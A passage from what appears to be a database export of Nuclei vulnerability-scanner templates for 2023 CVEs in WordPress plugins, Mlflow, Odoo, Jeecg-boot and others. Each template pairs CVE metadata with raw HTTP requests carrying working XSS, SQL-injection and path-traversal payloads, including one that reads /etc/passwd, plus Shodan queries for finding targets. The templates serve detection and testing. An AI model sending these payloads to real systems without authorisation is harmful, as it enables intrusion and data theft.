digest: 490a0046304402205451db383786918c1f14b6751c0ffaeb263600bab8cc76dc938cf3e1847531b902203c9a566e2f17d7cd2501e5dad53491de15f0dcbe0b569a5be1a41ca489e8b894:922c64590222798bb761d5b6d8e72950", "hash": "62a8a753814bd41ee0b48ff02938e381", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085fc" }, "name": "CVE-2023-0942.yaml", "content": "id: CVE-2023-0942\n\ninfo:\n name: WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.5.5.\n reference:\n - https://wpscan.com/vulnerability/71aa9460-6dea-49cc-946c-d7d4bf723511\n - https://wordpress.org/plugins/woocommerce-for-japan/\n - https://plugins.trac.wordpress.org/browser/woocommerce-for-japan/trunk/includes/admin/views/html-admin-setting-screen.php#L63\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0942\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2868545%40woocommerce-for-japan%2Ftrunk&old=2863064%40woocommerce-for-japan%2Ftrunk&sfp_email=&sfph_mail=\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0942\n cwe-id: CWE-79\n epss-score: 0.0049\n epss-percentile: 0.7561\n cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: artisanworkshop\n product: japanized_for_woocommerce\n framework: wordpress\n tags: cve2023,cve,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,xss,woocommerce,plugin,artisanworkshop\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=wc4jp-options&tab=a HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"\") && contains(body_2, \"woocommerce-for-japan\")'\n condition: and\n# digest: 4a0a0047304502205a6154be3977335b0b6a8edafe8ebf0cdc8be8592b0dde724b514055ced4fc0e022100935f1df2f35df2ff8160527c45087dc5c1a387351a1dcc8ea9fea63d30041d53:922c64590222798bb761d5b6d8e72950", "hash": "ad800c6b4874778797576142ba8ccbca", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085fd" }, "name": "CVE-2023-0947.yaml", "content": "id: CVE-2023-0947\n\ninfo:\n name: Flatpress < 1.3 - Path Traversal\n author: r3Y3r53\n severity: critical\n description: |\n Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.\n reference:\n - https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0947\n - https://github.com/flatpressblog/flatpress/commit/9c4e5d6567e446c472f3adae3b2fe612f66871c7\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-0947\n cwe-id: CWE-22\n epss-score: 0.0114\n epss-percentile: 0.84427\n cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: flatpress\n product: flatpress\n shodan-query: http.favicon.hash:-1189292869\n tags: cve,cve2023,huntr,lfi,flatpress,listing\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fp-content/\"\n - \"{{BaseURL}}/flatpress/fp-content/\"\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"Index of /fp-content\")'\n condition: and\n# digest: 4a0a00473045022100a6fad072aa7b7a33eeb7febfa517c81a87cdd0458f78e659f4436d97e14cda8c02201122c5d07ec27092761f1e6d267c54e6cd56b9d6df20fe247ee60f0783601bd2:922c64590222798bb761d5b6d8e72950", "hash": "a08fa9fb96cca19edbc7ec9178f6f95d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085fe" }, "name": "CVE-2023-0948.yaml", "content": "id: CVE-2023-0948\n\ninfo:\n name: WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.5.8.\n reference:\n - https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718\n - https://wordpress.org/plugins/woocommerce-for-japan/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0948\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0948\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.29003\n cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 2\n vendor: artisanworkshop\n product: japanized_for_woocommerce\n framework: wordpress\n tags: cve,cve2023,wpscan,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=peachpay&tab=field&\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"peachpay\")'\n condition: and\n# digest: 4a0a0047304502207489300b27fc604ebc086d2dcf53a066f713bf6e155fc3d7e796b5d5e7073f41022100d763b61ecc36c48a60e65fcac863f65fb4d354916e78aef5854c9720707c38f4:922c64590222798bb761d5b6d8e72950", "hash": "a727bd73c658dbe6fa950190e2050dd0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ff" }, "name": "CVE-2023-0968.yaml", "content": "id: CVE-2023-0968\n\ninfo:\n name: WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.\n remediation: Fixed in version 3.3.9.1.\n reference:\n - https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595\n - https://wordpress.org/plugins/watu/\n - https://plugins.trac.wordpress.org/browser/watu/trunk/views/takings.php#L31\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0968\n - https://www.wordfence.com/threat-intel/vulnerabilities/id/6341bdcc-c99f-40c3-81c4-ad90ff19f802\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0968\n cwe-id: CWE-79\n epss-score: 0.00229\n epss-percentile: 0.61047\n cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: kibokolabs\n product: watu_quiz\n framework: wordpress\n tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"/onmouseover=alert(document.domain)//\")'\n - 'contains(body_2, \"Watu Quizzes\")'\n condition: and\n# digest: 490a004630440220101a9d9c53b24a7571530b23ae247be38f0e4664af24681277fdacfd89e411ce02206695c9ba4925e33fea75684fa188a7bbe650cbebaa6750343535fa6fa8939a43:922c64590222798bb761d5b6d8e72950", "hash": "ede9a22749483863a2af0b6206c946d5", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308600" }, "name": "CVE-2023-1020.yaml", "content": "id: CVE-2023-1020\n\ninfo:\n name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n remediation: |\n Update to the latest version of the Steveas WP Live Chat Shoutbox plugin (1.4.2) or apply the vendor-provided patch to fix the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff\n - https://wordpress.org/plugins/wp-shoutbox-live-chat/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1020\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1020\n cwe-id: CWE-89\n epss-score: 0.05497\n epss-percentile: 0.93034\n cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wp_live_chat_shoutbox_project\n product: wp_live_chat_shoutbox\n framework: wordpress\n tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25b\"\n - \"no_participation\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fac5c85ebe071ae5ef03e6745f869794a516d4dd1a7fd22f58ec3d490039c84c022100cafea571a15f3be63d57818f9c9386f1433fe77561b33395aeb30cde8b682100:922c64590222798bb761d5b6d8e72950", "hash": "7ce86054e6dee4269f312a60041782fe", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308601" }, "name": "CVE-2023-1080.yaml", "content": "id: CVE-2023-1080\n\ninfo:\n name: WordPress GN Publisher <1.5.6 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: Fixed in version 1.5.6.\n reference:\n - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74\n - https://wordpress.org/plugins/gn-publisher/\n - https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1080\n - https://plugins.trac.wordpress.org/browser/gn-publisher/trunk/templates/settings.php#L70\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1080\n cwe-id: CWE-79\n epss-score: 0.0025\n epss-percentile: 0.64332\n cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: gnpublisher\n product: gn_publisher\n framework: wordpress\n tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"/ onmouseover=alert(document.domain);//\")'\n - 'contains(body_2, \"GN Publisher\")'\n condition: and\n# digest: 4b0a004830460221009e1ffc42fadc2223a2bde2cfca3d21b2ccb40f02c1ccf27a1ded4325da215dfb022100fd1a246c50613256dcd59279b3f0ea4fcde05ce171adfeabd1d5068a35986ed9:922c64590222798bb761d5b6d8e72950", "hash": "9799278f632002133876da66a6adfa41", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308602" }, "name": "CVE-2023-1177.yaml", "content": "id: CVE-2023-1177\n\ninfo:\n name: Mlflow <2.2.1 - Local File Inclusion\n author: iamnoooob,pdresearch\n severity: critical\n description: |\n Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation could allow an attacker to read sensitive files on the server.\n remediation: |\n Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability.\n reference:\n - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/\n - https://github.com/mlflow/mlflow/commit/7162a50c654792c21f3e4a160eb1a0e6a34f6e6e\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1177\n - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1177\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1177\n cwe-id: CWE-29,CWE-22\n epss-score: 0.02668\n epss-percentile: 0.89327\n cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: lfprojects\n product: mlflow\n shodan-query: http.title:\"mlflow\"\n tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects\n\nhttp:\n - raw:\n - |\n POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json; charset=utf-8\n\n {\"name\":\"{{randstr}}\"}\n - |\n POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json; charset=utf-8\n\n {\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n - |\n GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - '\"version\": \"([0-9.]+)\",'\n internal: true\n part: body\n# digest: 4b0a00483046022100d755ca22bd1d15b3e2037d22374fbe60d7b1db9c35cc6a4cad95e1b57c88d42a022100c8c05dd9d1b11648b906d574c3f74255eabdd64d0283c45bb8dac0ee7c66c3cc:922c64590222798bb761d5b6d8e72950", "hash": "c34cb9219b3ab6e66d9498e04b3b3bc4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308603" }, "name": "CVE-2023-1263.yaml", "content": "id: CVE-2023-1263\n\ninfo:\n name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n remediation: Fixed in version 4.1.7\n reference:\n - https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1263\n - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure\n - https://wordpress.org/plugins/cmp-coming-soon-maintenance/\n - https://plugins.trac.wordpress.org/browser/cmp-coming-soon-maintenance/tags/4.1.6/niteo-cmp.php#L2759\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2023-1263\n cwe-id: CWE-200\n epss-score: 0.00238\n epss-percentile: 0.61195\n cpe: cpe:2.3:a:niteothemes:coming_soon_\\&_maintenance:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: niteothemes\n product: coming_soon_\\&_maintenance\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/cmp-coming-soon-maintenance/\"\n tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=cmp_get_post_detail&id=1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"img\":'\n - '\"date\":'\n - '\"title\":'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022011e5f903b0a93f9e3c06ec147cc8c3f99a9d83b16945cc273a867de1c81ea74e0221009f399c551bcf521294a213c1b973399eb02bea51059fdf559b11acf56aff52ac:922c64590222798bb761d5b6d8e72950", "hash": "cd2f590b25c2a4c97bc2d09492bbf553", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308604" }, "name": "CVE-2023-1362.yaml", "content": "id: CVE-2023-1362\n\ninfo:\n name: unilogies/bumsys < v2.0.2 - Clickjacking\n author: ctflearner\n severity: medium\n description: |\n This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n impact: |\n An attacker can trick users into performing unintended actions on the vulnerable application.\n remediation: |\n Upgrade to version 2.0.2 or later to mitigate the Clickjacking vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1362\n - https://huntr.dev/bounties/e5959166-c8ef-4ada-9bb1-0ff5a9693bac/\n - https://github.com/unilogies/bumsys/commit/8c5b27d54707f9805b27ef26ad741f2801e30e1f\n - https://github.com/ctflearner/ctflearner\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1362\n cwe-id: CWE-1021\n epss-score: 0.00421\n epss-percentile: 0.71594\n cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bumsys_project\n product: bumsys\n tags: cve,cve2023,bumsys,clickjacking,huntr,bumsys_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 200\"\n - \"!regex('X-Frame-Options', header)\"\n - \"contains(body, 'BUMSys')\"\n condition: and\n# digest: 4b0a00483046022100db736e1f7e3b60b5cdc1776b06c2485456e5878e8fb3742146e4e593eeaa3f95022100f0fbea2cbfdb563686635b04f3c66d63dc0874d5c884e91e104af6118f8f9deb:922c64590222798bb761d5b6d8e72950", "hash": "0659401445eb334be615f61ae881393f", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308605" }, "name": "CVE-2023-1408.yaml", "content": "id: CVE-2023-1408\n\ninfo:\n name: Video List Manager <= 1.7 - SQL Injection\n author: r3Y3r53\n severity: high\n description: |\n The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n reference:\n - https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b\n - https://wordpress.org/plugins/video-list-manager/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1408\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2023-1408\n cwe-id: CWE-89\n epss-score: 0.01339\n epss-percentile: 0.84615\n cpe: cpe:2.3:a:video_list_manager_project:video_list_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: video_list_manager_project\n product: video_list_manager\n framework: wordpress\n publicwww-query: /wp-content/plugins/video-list-manager/\n tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 15s\n GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=7'\n - 'status_code_2 == 200'\n - 'contains_all(body_2, \"Edit Video\",\"Youtube\")'\n condition: and\n# digest: 490a004630440220557189f3aeda3c74e23c7c2eafca9a9ffd0d874f4c21f4998f0fa7da5b3d34390220535b42e7ed0a6ca565fbab863cb242ca58ab68d291a3470b7e8c5d54ebf0de30:922c64590222798bb761d5b6d8e72950", "hash": "6e384ac0fe4bc3555bb93da4dc1fd334", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308606" }, "name": "CVE-2023-1434.yaml", "content": "id: CVE-2023-1434\n\ninfo:\n name: Odoo - Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: |\n Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434\n classification:\n cve-id: CVE-2023-1434\n cwe-id: CWE-79\n metadata:\n verified: true\n max-request: 1\n shodan-query: title:\"Odoo\"\n tags: cve2023,cve,odoo,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web/set_profiling?profile=0&collectors=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '\"params\":'\n - 'session'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009f88c973f15e82b4aad7aedc75098b0daca742aa8b6fe3cfb11e203d2306539b022050fd604d6227ce671990eaac0780f3c69d00cd07567190bf96d24b10177fddb3:922c64590222798bb761d5b6d8e72950", "hash": "519b0a8d7a78402a5b968e8f08b84d3b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308607" }, "name": "CVE-2023-1454.yaml", "content": "id: CVE-2023-1454\n\ninfo:\n name: Jeecg-boot 3.5.0 qurestSql - SQL Injection\n author: DhiyaneshDK\n severity: critical\n description: |\n A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1454\n - https://vuldb.com/?ctiid.223299\n - https://vuldb.com/?id.223299\n - https://github.com/Awrrays/FrameVul\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1454\n cwe-id: CWE-89\n epss-score: 0.04509\n epss-percentile: 0.92282\n cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: jeecg\n product: jeecg-boot\n shodan-query: http.favicon.hash:1380908726\n tags: cve2023,cve,jeecg,sqli\n\nhttp:\n - raw:\n - |\n POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json;charset=UTF-8\n\n {\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"SQLException\"\n - \"XPATH syntax error:\"\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"XPATH syntax error: '([a-z_@%]+)'\"\n - \"XPATH syntax error: '([a-z- @%]+)'\"\n - \"XPATH syntax error: '([a-z@%0-9.]+)'\"\n part: body\n# digest: 490a0046304402201617c97220bd0ac605e36efc6731e6e680ab819a2d613804423de883aba8d1eb0220562bcbd34db0c1ce70cd835193e6819e76e7cef2925feda6621420165482860b:922c64590222798bb761d5b6d8e72950", "hash": "d7339b54abe9b996108b9428c3c55802", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308608" }, "name": "CVE-2023-1496.yaml", "content": "id: CVE-2023-1496\n\ninfo:\n name: Imgproxy < 3.14.0 - Cross-site Scripting (XSS)\n author: pdteam\n severity: medium\n description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689\n - https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2023-1496\n cwe-id: CWE-79\n epss-score: 0.00085\n epss-percentile: 0.34963\n cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: evilmartians\n product: imgproxy\n shodan-query: \"Server: imgproxy\"\n tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg\"\n\n matchers:\n - type: dsl\n dsl:\n - contains(body, 'PC9zdmc+#test')\n - status_code == 200\n condition: and\n\n extractors:\n - type: dsl\n dsl:\n - content_security_policy\n# digest: 4a0a0047304502202ad789f0ac262a3012d88a82fabcb0495918466b6945c80a40a9cf0f17501756022100fcd6b4965a63afc6ed0a5933664366f832ca12cc04bd2e4809dbd1fec88dc51b:922c64590222798bb761d5b6d8e72950", "hash": "a5fbe66cdf14b9a223dbbd63bc7d4118", "level": 4, 